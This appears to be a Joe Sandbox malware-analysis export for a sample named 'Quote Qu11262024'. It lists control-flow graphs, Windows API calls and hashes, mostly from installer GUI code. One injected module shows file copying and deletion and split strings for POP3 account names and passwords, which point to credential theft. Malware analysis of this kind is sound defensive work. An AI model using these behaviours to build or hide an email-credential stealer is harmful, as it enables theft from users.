                                                                                                    control_flow_graph 270 405339-405355 271 4054e4-4054ea 270->271 272 40535b-405422 GetDlgItem * 3 call 4041a8 call 404a99 GetClientRect GetSystemMetrics SendMessageA * 2 270->272 274 405514-405520 271->274 275 4054ec-40550e GetDlgItem CreateThread CloseHandle 271->275 293 405440-405443 272->293 294 405424-40543e SendMessageA * 2 272->294 277 405542-405548 274->277 278 405522-405528 274->278 275->274 282 40554a-405550 277->282 283 40559d-4055a0 277->283 280 405563-40556a call 4041da 278->280 281 40552a-40553d ShowWindow * 2 call 4041a8 278->281 290 40556f-405573 280->290 281->277 287 405552-40555e call 40414c 282->287 288 405576-405586 ShowWindow 282->288 283->280 285 4055a2-4055a8 283->285 285->280 295 4055aa-4055bd SendMessageA 285->295 287->280 291 405596-405598 call 40414c 288->291 292 405588-405591 call 4051fb 288->292 291->283 292->291 299 405453-40546a call 404173 293->299 300 405445-405451 SendMessageA 293->300 294->293 301 4055c3-4055ef CreatePopupMenu call 4060f6 AppendMenuA 295->301 302 4056ba-4056bc 295->302 309 4054a0-4054c1 GetDlgItem SendMessageA 299->309 310 40546c-405480 ShowWindow 299->310 300->299 307 4055f1-405601 GetWindowRect 301->307 308 405604-40561a TrackPopupMenu 301->308 302->290 307->308 308->302 312 405620-40563a 308->312 309->302 311 4054c7-4054df SendMessageA * 2 309->311 313 405482-40548d ShowWindow 310->313 314 40548f 310->314 311->302 316 40563f-40565a SendMessageA 312->316 315 405495-40549b call 4041a8 313->315 314->315 315->309 316->316 317 40565c-40567c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 316->317 319 40567e-40569e SendMessageA 317->319 319->319 320 4056a0-4056b4 GlobalUnlock SetClipboardData CloseClipboard 319->320 320->302
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405398
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004053A7
                                                                                                    • GetClientRect.USER32(?,?), ref: 004053E4
                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004053EB
                                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040540C
                                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040541D
                                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405430
                                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040543E
                                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405451
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405473
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405487
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054A8
                                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054B8
                                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054D1
                                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054DD
                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004053B6
                                                                                                      • Part of subcall function 004041A8: SendMessageA.USER32(00000028,?,00000001,00403FD8), ref: 004041B6
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054F9
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000052CD,00000000), ref: 00405507
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040550E
                                                                                                    • ShowWindow.USER32(00000000), ref: 00405531
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405538
                                                                                                    • ShowWindow.USER32(00000008), ref: 0040557E
                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055B2
                                                                                                    • CreatePopupMenu.USER32 ref: 004055C3
                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055D8
                                                                                                    • GetWindowRect.USER32(?,000000FF), ref: 004055F8
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405611
                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564D
                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040565D
                                                                                                    • EmptyClipboard.USER32 ref: 00405663
                                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 0040566C
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405676
                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040568A
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004056A3
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 004056AE
                                                                                                    • CloseClipboard.USER32 ref: 004056B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                    • String ID: 0B
                                                                                                    • API String ID: 590372296-4132856435
                                                                                                    • Opcode ID: 0a791cf9bd435124ea4154e9199a20c9dd06210b17fdcaaf5871d9aeae2f7f09
                                                                                                    • Instruction ID: d18d2a4e752201d452310a28e4e69996c522da863cc3ae48ecc46783cc9b3639
                                                                                                    • Opcode Fuzzy Hash: 0a791cf9bd435124ea4154e9199a20c9dd06210b17fdcaaf5871d9aeae2f7f09
                                                                                                    • Instruction Fuzzy Hash: 47A15B71900608BFDB119FA0DE89EAE7F79FB44355F00403AFA05BA1A0CB794E519F58

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 443 403c9f-403cb1 444 403df2-403e01 443->444 445 403cb7-403cbd 443->445 447 403e50-403e65 444->447 448 403e03-403e4b GetDlgItem * 2 call 404173 SetClassLongA call 40140b 444->448 445->444 446 403cc3-403ccc 445->446 449 403ce1-403ce4 446->449 450 403cce-403cdb SetWindowPos 446->450 452 403ea5-403eaa call 4041bf 447->452 453 403e67-403e6a 447->453 448->447 454 403ce6-403cf8 ShowWindow 449->454 455 403cfe-403d04 449->455 450->449 460 403eaf-403eca 452->460 457 403e6c-403e77 call 401389 453->457 458 403e9d-403e9f 453->458 454->455 461 403d20-403d23 455->461 462 403d06-403d1b DestroyWindow 455->462 457->458 480 403e79-403e98 SendMessageA 457->480 458->452 465 404140 458->465 466 403ed3-403ed9 460->466 467 403ecc-403ece call 40140b 460->467 471 403d25-403d31 SetWindowLongA 461->471 472 403d36-403d3c 461->472 468 40411d-404123 462->468 470 404142-404149 465->470 476 4040fe-404117 DestroyWindow EndDialog 466->476 477 403edf-403eea 466->477 467->466 468->465 475 404125-40412b 468->475 471->470 478 403d42-403d53 GetDlgItem 472->478 479 403ddf-403ded call 4041da 472->479 475->465 481 40412d-404136 ShowWindow 475->481 476->468 477->476 482 403ef0-403f3d call 4060f6 call 404173 * 3 GetDlgItem 477->482 483 403d72-403d75 478->483 484 403d55-403d6c SendMessageA IsWindowEnabled 478->484 479->470 480->470 481->465 513 403f47-403f83 ShowWindow EnableWindow call 404195 EnableWindow 482->513 514 403f3f-403f44 482->514 488 403d77-403d78 483->488 489 403d7a-403d7d 483->489 484->465 484->483 491 403da8-403dad call 40414c 488->491 492 403d8b-403d90 489->492 493 403d7f-403d85 489->493 491->479 494 403d92-403d98 492->494 495 403dc6-403dd9 SendMessageA 492->495 493->495 498 403d87-403d89 493->498 499 403d9a-403da0 call 40140b 494->499 500 403daf-403db8 call 40140b 494->500 495->479 498->491 509 403da6 499->509 500->479 510 403dba-403dc4 500->510 509->491 510->509 517 403f85-403f86 513->517 518 403f88 513->518 514->513 519 403f8a-403fb8 GetSystemMenu EnableMenuItem SendMessageA 517->519 518->519 520 403fba-403fcb SendMessageA 519->520 521 403fcd 519->521 522 403fd3-40400d call 4041a8 call 403c80 call 4060d4 lstrlenA call 4060f6 SetWindowTextA call 401389 520->522 521->522 522->460 533 404013-404015 522->533 533->460 534 40401b-40401f 533->534 535 404021-404027 534->535 536 40403e-404052 DestroyWindow 534->536 535->465 537 40402d-404033 535->537 536->468 538 404058-404085 CreateDialogParamA 536->538 537->460 539 404039 537->539 538->468 540 40408b-4040e2 call 404173 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 538->540 539->465 540->465 545 4040e4-4040fc ShowWindow call 4041bf 540->545 545->468
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CDB
                                                                                                    • ShowWindow.USER32(?), ref: 00403CF8
                                                                                                    • DestroyWindow.USER32 ref: 00403D0C
                                                                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D28
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403D49
                                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D5D
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D64
                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403E12
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403E1C
                                                                                                    • SetClassLongA.USER32(?,000000F2,?), ref: 00403E36
                                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E87
                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403F2D
                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403F4E
                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F60
                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F7B
                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F91
                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403F98
                                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB0
                                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FC3
                                                                                                    • lstrlenA.KERNEL32(00420D30,?,00420D30,00000000), ref: 00403FED
                                                                                                    • SetWindowTextA.USER32(?,00420D30), ref: 00403FFC
                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404130
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                    • String ID: 0B
                                                                                                    • API String ID: 184305955-4132856435
                                                                                                    • Opcode ID: 12ff2592549ab96dec6579ea8af2d1c277a104131c6f03b81179603580748a72
                                                                                                    • Instruction ID: 30db9fb023d46c2b45d50756591254b9d2d19bbbd826df3873c5888a3d469ee7
                                                                                                    • Opcode Fuzzy Hash: 12ff2592549ab96dec6579ea8af2d1c277a104131c6f03b81179603580748a72
                                                                                                    • Instruction Fuzzy Hash: FCC12271600204BBDB206F61EE89E2B3ABDFB84306F51053EF651B51F1CB7999829B1D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 548 403902-40391a call 40646c 551 40391c-40392c call 406032 548->551 552 40392e-40395f call 405fbb 548->552 560 403982-4039ab call 403bc7 call 405b5a 551->560 557 403961-403972 call 405fbb 552->557 558 403977-40397d lstrcatA 552->558 557->558 558->560 566 4039b1-4039b6 560->566 567 403a32-403a3a call 405b5a 560->567 566->567 568 4039b8-4039dc call 405fbb 566->568 573 403a48-403a6d LoadImageA 567->573 574 403a3c-403a43 call 4060f6 567->574 568->567 575 4039de-4039e0 568->575 577 403aee-403af6 call 40140b 573->577 578 403a6f-403a9f RegisterClassA 573->578 574->573 582 4039f1-4039fd lstrlenA 575->582 583 4039e2-4039ef call 405a97 575->583 590 403b00-403b0b call 403bc7 577->590 591 403af8-403afb 577->591 579 403aa5-403ae9 SystemParametersInfoA CreateWindowExA 578->579 580 403bbd 578->580 579->577 588 403bbf-403bc6 580->588 584 403a25-403a2d call 405a6c call 4060d4 582->584 585 4039ff-403a0d lstrcmpiA 582->585 583->582 584->567 585->584 589 403a0f-403a19 GetFileAttributesA 585->589 594 403a1b-403a1d 589->594 595 403a1f-403a20 call 405ab3 589->595 601 403b11-403b2b ShowWindow call 4063fe 590->601 602 403b94-403b9c call 4052cd 590->602 591->588 594->584 594->595 595->584 609 403b37-403b49 GetClassInfoA 601->609 610 403b2d-403b32 call 4063fe 601->610 607 403bb6-403bb8 call 40140b 602->607 608 403b9e-403ba4 602->608 607->580 608->591 611 403baa-403bb1 call 40140b 608->611 614 403b61-403b92 DialogBoxParamA call 40140b call 403852 609->614 615 403b4b-403b5b GetClassInfoA RegisterClassA 609->615 610->609 611->591 614->588 615->614
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040646C: GetModuleHandleA.KERNEL32(?,?,?,0040339B,0000000A), ref: 0040647E
                                                                                                      • Part of subcall function 0040646C: GetProcAddress.KERNEL32(00000000,?), ref: 00406499
                                                                                                    • lstrcatA.KERNEL32(0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,76233410,0042B400,0042A000,00000000), ref: 0040397D
                                                                                                    • lstrlenA.KERNEL32(004236C0,?,?,?,004236C0,00000000,0042A400,0042B000,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,76233410), ref: 004039F2
                                                                                                    • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A05
                                                                                                    • GetFileAttributesA.KERNEL32(004236C0), ref: 00403A10
                                                                                                    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,0042A400), ref: 00403A59
                                                                                                      • Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F
                                                                                                    • RegisterClassA.USER32(00423EC0), ref: 00403A96
                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AAE
                                                                                                    • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AE3
                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403B19
                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B45
                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B52
                                                                                                    • RegisterClassA.USER32(00423EC0), ref: 00403B5B
                                                                                                    • DialogBoxParamA.USER32(?,00000000,00403C9F,00000000), ref: 00403B7A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$0B$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                    • API String ID: 1975747703-610843794
                                                                                                    • Opcode ID: fda6b71a4b62fb194c0d10bc80d9f9589af0c3311cf6e62058a93a002737173e
                                                                                                    • Instruction ID: 39a269e0f652501f5ae319d3c1712d535f8ca0f02f8520fc91e595cfb3b0c8d2
                                                                                                    • Opcode Fuzzy Hash: fda6b71a4b62fb194c0d10bc80d9f9589af0c3311cf6e62058a93a002737173e
                                                                                                    • Instruction Fuzzy Hash: F261D4707406006ED620AF65AD45F2B7A6CEB8574AF40047FF991B22E2DB7D9D028E2D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 622 4042de-4042ee 623 404400-404413 622->623 624 4042f4-4042fc 622->624 625 404415-40441e 623->625 626 40446f-404473 623->626 627 4042fe-40430d 624->627 628 40430f-4043a7 call 404173 * 2 CheckDlgButton call 404195 GetDlgItem call 4041a8 SendMessageA 624->628 629 404424-40442c 625->629 630 404548 625->630 632 404539-404540 626->632 633 404479-40448d GetDlgItem 626->633 627->628 662 4043b2-4043fb SendMessageA * 2 lstrlenA SendMessageA * 2 628->662 663 4043a9-4043ac GetSysColor 628->663 629->630 634 404432-40443e 629->634 637 40454b-404552 call 4041da 630->637 632->630 636 404542 632->636 638 4044f7-4044fe 633->638 639 40448f-404496 633->639 634->630 641 404444-40446a GetDlgItem SendMessageA call 404195 call 40455e 634->641 636->630 648 404557-40455b 637->648 638->637 640 404500-404507 638->640 639->638 644 404498-4044b3 639->644 640->637 645 404509-40450d 640->645 641->626 644->638 649 4044b5-4044f4 SendMessageA LoadCursorA SetCursor call 404582 LoadCursorA SetCursor 644->649 651 404520-404524 645->651 652 40450f-40451e SendMessageA 645->652 649->638 656 404534-404537 651->656 657 404526-404532 SendMessageA 651->657 652->651 656->648 657->656 662->648 663->662
                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404369
                                                                                                    • GetDlgItem.USER32(00000000,000003E8), ref: 0040437D
                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
                                                                                                    • GetSysColor.USER32(?), ref: 004043AC
                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043BB
                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043CA
                                                                                                    • lstrlenA.KERNEL32(?), ref: 004043CD
                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043DC
                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F1
                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404453
                                                                                                    • SendMessageA.USER32(00000000), ref: 00404456
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404481
                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C1
                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 004044D0
                                                                                                    • SetCursor.USER32(00000000), ref: 004044D9
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004044EF
                                                                                                    • SetCursor.USER32(00000000), ref: 004044F2
                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040451E
                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404532
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                    • String ID: N
                                                                                                    • API String ID: 3103080414-1130791706
                                                                                                    • Opcode ID: 0c968106e8d883bb14fe98f1b6ae28756d552618529139a26f6dc2dd7f4833b3
                                                                                                    • Instruction ID: 5467620291def9f0cb7e653f2c75e0a221fb427c463d83c88ee12cfaff6fab55
                                                                                                    • Opcode Fuzzy Hash: 0c968106e8d883bb14fe98f1b6ae28756d552618529139a26f6dc2dd7f4833b3
                                                                                                    • Instruction Fuzzy Hash: 1061C3B1A00209BFEB109F61DD45F6A7B69FB84714F10803AFB01BA1D1C7B8A951CF98

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 664 3714173a-371417fe call 3714c030 call 37142c40 * 2 671 37141803 call 37141cca 664->671 672 37141808-3714180c 671->672 673 37141812-37141816 672->673 674 371419ad-371419b1 672->674 673->674 675 3714181c-37141837 call 37141ede 673->675 678 3714183d-37141845 675->678 679 3714199f-371419ac call 37141ee7 * 2 675->679 680 37141982-37141985 678->680 681 3714184b-3714184e 678->681 679->674 683 37141995-37141999 680->683 684 37141987 680->684 681->680 685 37141854-37141881 call 371444b0 * 2 call 37141db7 681->685 683->678 683->679 687 3714198a-3714198d call 37142c40 684->687 698 37141887-3714189f call 371444b0 call 37141db7 685->698 699 3714193d-37141943 685->699 693 37141992 687->693 693->683 698->699 712 371418a5-371418a8 698->712 700 37141945-37141947 699->700 701 3714197e-37141980 699->701 700->701 703 37141949-3714194b 700->703 701->687 705 37141961-3714197c call 371416aa 703->705 706 3714194d-3714194f 703->706 705->693 708 37141955-37141957 706->708 709 37141951-37141953 706->709 713 3714195d-3714195f 708->713 714 37141959-3714195b 708->714 709->705 709->708 716 371418c4-371418dc call 371444b0 call 37141db7 712->716 717 371418aa-371418c2 call 371444b0 call 37141db7 712->717 713->701 713->705 714->705 714->713 716->683 726 371418e2-3714193b call 371416aa call 371415da call 37142c40 * 2 716->726 717->716 717->726 726->683
                                                                                                    APIs
                                                                                                      • Part of subcall function 37141CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 37141D1B
                                                                                                      • Part of subcall function 37141CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 37141D37
                                                                                                      • Part of subcall function 37141CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 37141D4B
                                                                                                    • _strlen.LIBCMT ref: 37141855
                                                                                                    • _strlen.LIBCMT ref: 37141869
                                                                                                    • _strlen.LIBCMT ref: 3714188B
                                                                                                    • _strlen.LIBCMT ref: 371418AE
                                                                                                    • _strlen.LIBCMT ref: 371418C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                    • API String ID: 3296212668-3023110444
                                                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                    • Instruction ID: 219a98a5b1ed251f3ea6767213ec70e878c5e6b9ce3a0a56663714d0ed8e898d
                                                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                    • Instruction Fuzzy Hash: 616124B7D00319AFEF52CBA6CC40BDEB7BBAF05210F404056D504B7250EB786A46DB52

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4635689631.0000000037141000.00000040.00001000.00020000.00000000.sdmp, Offset: 37140000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4635673088.0000000037140000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4635689631.0000000037156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_37140000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen
                                                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                    • API String ID: 4218353326-230879103
                                                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                    • Instruction ID: 7f4fc82875c897150df184508ee25c7dbb0d3431d548c27effcc65ae50833f5d
                                                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                    • Instruction Fuzzy Hash: CF7136B3C002685BDF22DBB1CC84ADF7BFDAF09240F1400A6D944E3241E6389789DBA1

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                    • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.4604206586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.4604186321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605360249.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605386033.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.4605408589.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: F
                                                                                                    • API String ID: 941294808-1304234792
                                                                                                    • Opcode ID: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                                                                    • Instruction ID: efe066deb40a78245321151b9dab29af26a41e73ee4a669cec0cc25ab5e9cd35
                                                                                                    • Opcode Fuzzy Hash: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                                                                    • Instruction Fuzzy Hash: 89418C71800209AFCF058F95DE459AFBBB9FF45315F00802EF5A1AA1A0CB389A55DFA4
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404654
                                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 0040467E
                                                                                                    • SHBrowseForFolderA.SHELL32(?,00420108,?), ref: 0040472F
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040473A
                                                                                                    • lstrcmpiA.KERNEL32(004236C0,00420D30), ref: 0040476C
                                                                                                    • lstrcatA.KERNEL32(?,004236C0), ref: 00404778
                                                                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040478A
                                                                                                      • Part of subcall function 004057D4: GetDlgItemTextA.USER32(?,?,00000400,004047C1), ref: 004057E7
                                                                                                      • Part of subcall function 0040633E: CharNextA.USER32(?,*?|<>/":,00000000,0042A000,76233410,0042B400,00000000,00403303,0042B400,0042B400,0040353A,?,00000006,00000008,0000000A), ref: 00406396
